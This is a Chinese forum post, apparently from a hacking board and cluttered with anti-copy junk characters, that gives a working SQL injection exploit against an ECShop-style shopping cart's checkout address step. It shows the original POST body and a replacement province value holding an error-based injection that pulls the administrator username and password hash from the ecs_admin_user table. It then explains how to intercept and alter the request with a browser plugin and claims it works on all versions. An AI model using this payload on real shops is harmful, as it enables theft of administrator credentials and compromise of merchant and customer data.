感谢欠杀的黑盒9 J0 e$ B1 M. X7 B! l$ l0 O" E+ L0 U
- u4 C) ^: P* J$ G' P7 b
7 A2 W% k% e( e! q7 y( R把任意商品加入购物车在填写配送地址那一页,有地区选择* a% k; F; u% X" I
1 }4 w! {" c' B1 X: ]) u
flow.php?step=consignee&direct_shopping=1
N$ q" v9 S5 R( Z. ^比如省选择安徽7 ?: z: w# }( R7 a# C3 l
3 P3 g7 T: C# A其中POST数据如下5 N3 f' U" u. v6 ?, P; B
7 H5 U0 p' t) |* T, vcountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
% J3 Y% g5 N4 _, C' b; h. J& q改成
% r( t: ~5 _- ?1 c8 m ; _: H' _- K$ N8 ]7 X8 L! I
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #+ Y8 y: G1 |% H1 N6 L
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
& f$ R6 N7 t5 O( r 6 M( z+ p9 R* H9 L; W
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
( A7 S- s% v" E, A( G8 A0 ~8 t4 X " h5 z, C0 E. ?# e d6 C4 b1 B- r
就会回显错误页面了。。。。4 R% e3 S# L% ]* u4 U# j
i+ l( U4 U0 F0 O我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
) M. t: u' l k: f. i2 y |